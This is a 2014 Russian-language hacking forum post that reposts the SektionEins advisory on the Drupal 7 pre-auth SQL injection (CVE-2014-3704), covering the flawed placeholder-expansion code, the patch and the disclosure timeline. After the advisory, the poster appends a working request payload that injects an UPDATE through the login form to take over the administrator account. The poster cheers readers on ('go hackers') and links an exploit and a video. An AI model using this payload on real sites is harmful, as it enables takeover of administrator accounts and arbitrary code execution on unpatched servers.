16.10.2014, 16:21
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability
lol
https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
Код:
SektionEins GmbH
www.sektioneins.de
-= Security Advisory =-
Advisory: Drupal - pre-auth SQL Injection Vulnerability
Release Date: 2014/10/15
Last Modified: 2014/10/15
Author: Stefan Horst [stefan.horst[at]sektioneins.de]
Application: Drupal >= 7.0 $data) {
$new_keys = array();
foreach ($data as $i => $value) {
// This assumes that there are no other placeholders that use the same
// name. For example, if the array placeholder is defined as :example
// and there is already an :example_2 placeholder, this will generate
// a duplicate key. We do not account for that as the calling code
// is already broken if that happens.
$new_keys[$key . '_' . $i] = $value;
}
// Update the query with the new placeholders.
// preg_replace is necessary to ensure the replacement does not affect
// placeholders that start with the same exact text. For example, if the
// query contains the placeholders :foo and :foobar, and :foo has an
// array of values, using str_replace would affect both placeholders,
// but using the following preg_replace would only affect :foo because
// it is followed by a non-word character.
$query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
// Update the args array with the new placeholders.
unset($args[$key]);
$args += $new_keys;
$modified = TRUE;
}
return $modified;
}
The function assumes that it is called with an array which has no keys. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));
Which results in this SQL Statement
SELECT * from users where name IN (:name_0, :name_1)
with the parameters name_0 = user1 and name_1 = user2.
The Problem occurs, if the array has keys, which are no integers. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));
this results in an exploitable SQL query:
SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1
with parameters :name_test = user2.
Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can
be used to insert arbitrary data in the database, dump or modify existing data
or drop the whole database.
With the possibility to INSERT arbitrary data into the database an
attacker can execute any PHP code through Drupal features with callbacks.
Patch:
$new_keys = array();
foreach (array_values($data) as $i => $value) {
// This assumes that there are no other placeholders that use the same
// name. For example, if the array placeholder is defined as :example
// and there is already an :example_2 placeholder, this will generate
// a duplicate key. We do not account for that as the calling code
// is already broken if that happens.
$new_keys[$key . '_' . $i] = $value;
}
Proof of Concept:
SektionEins GmbH has developed a proof of concept, but was asked by
Drupal to postpone the release.
Disclosure Timeline:
16. Sep. 2014 - Notified the Drupal devs via security contact form
15. Okt. 2014 - Relase of Bugfix by Drupal core Developers
poc:
Код:
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
и работает ведь
вперед хэкеры
exploit:
http://pastebin.com/nDwLFV3v
video: http://www.youtube.com/watch?v=rHwJYD_yTlM
|
|
|